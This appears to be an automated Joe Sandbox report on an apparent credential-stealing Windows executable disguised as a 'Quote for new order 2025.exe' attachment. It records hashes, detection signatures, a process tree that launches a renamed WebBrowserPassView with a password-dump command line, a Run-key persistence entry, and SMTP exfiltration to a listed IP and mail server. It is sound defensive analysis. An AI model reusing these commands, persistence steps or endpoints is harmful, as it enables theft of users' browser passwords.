Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote for new order 2025.exe

Overview

General Information

Sample name:Quote for new order 2025.exe
Analysis ID:1586086
MD5:11de9d1bb135adb354e26bdad47037c9
SHA1:5fbeaf0df88266d5562da5c5f28ccd80e08f349b
SHA256:9285b4abeb09d675bc06b47444261c1f0034613d08b44b69c99c8ef63b1cfa72
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Quote for new order 2025.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 7612 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • Quote for new order 2025.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 7948 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • Quote for new order 2025.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 1816 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Quote for new order 2025.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\Chrom.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                Click to see the 6 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.Quote for new order 2025.exe.eaa5ec.1.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                  14.2.Chrom.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    4.0.Chrom.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                      0.0.Quote for new order 2025.exe.eaa5ec.1.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                        8.0.Chrom.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                          Click to see the 4 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\Quote for new order 2025.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Quote for new order 2025.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Application
                          Sigma detected: Suspicious Outbound SMTP Connections
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.158.126, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote for new order 2025.exe, Initiated: true, ProcessId: 7396, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: Quote for new order 2025.exeAvira: detected
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\Desktop\Chrom.exeReversingLabs: Detection: 80%
                          Multi AV Scanner detection for submitted file
                          Source: Quote for new order 2025.exeReversingLabs: Detection: 60%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                          Machine Learning detection for sample
                          Source: Quote for new order 2025.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00407687 GetProcAddress,FreeLibrary,CryptUnprotectData,CryptUnprotectData,4_2_00407687
                          Source: Quote for new order 2025.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: \obj\Debug\FoxmaiI.pdb source: Quote for new order 2025.exe
                          Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: Quote for new order 2025.exe, Chrom.exe.0.dr
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040B477 FindFirstFileW,FindNextFileW,4_2_0040B477
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, 70BB479Ch0_2_09E064E8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]0_2_09E017D0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]0_2_09E017D0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]0_2_09E017D0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, 70BB479Ch5_2_06F863B0
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]5_2_06F81710
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]5_2_06F81710
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]5_2_06F81710
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]11_2_075C0FD8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]11_2_075C0FD8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000007E4h]11_2_075C0FD8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 4x nop then mov ecx, 70BB479Ch11_2_075C5E58
                          Source: global trafficTCP traffic: 192.168.2.4:49733 -> 77.245.158.126:587
                          Source: global trafficTCP traffic: 192.168.2.4:49733 -> 77.245.158.126:587
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: Quote for new order 2025.exe, Chrom.exe.0.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                          Source: Quote for new order 2025.exe, Chrom.exe.0.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                          Source: Chrom.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                          Source: Chrom.exe, 00000004.00000003.1693528910.000000000098D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819462816.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000003.1818673130.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                          Source: Chrom.exe, 00000004.00000003.1693528910.000000000098D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819462816.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000003.1818673130.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                          Source: global trafficDNS traffic detected: DNS query: mail.lmd.com.tr
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                          Source: bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                          Source: bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                          Source: bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                          Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0Q
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://ocspx.digicert.com0E
                          Source: Quote for new order 2025.exe, 00000000.00000002.3530691403.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3530288167.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: bhv428D.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                          Source: Chrom.exe, 00000004.00000002.1693705327.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1818996004.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1901410541.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                          Source: Quote for new order 2025.exe, Chrom.exe.0.drString found in binary or memory: http://www.nirsoft.net/
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539348359.0000000005D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comH4
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
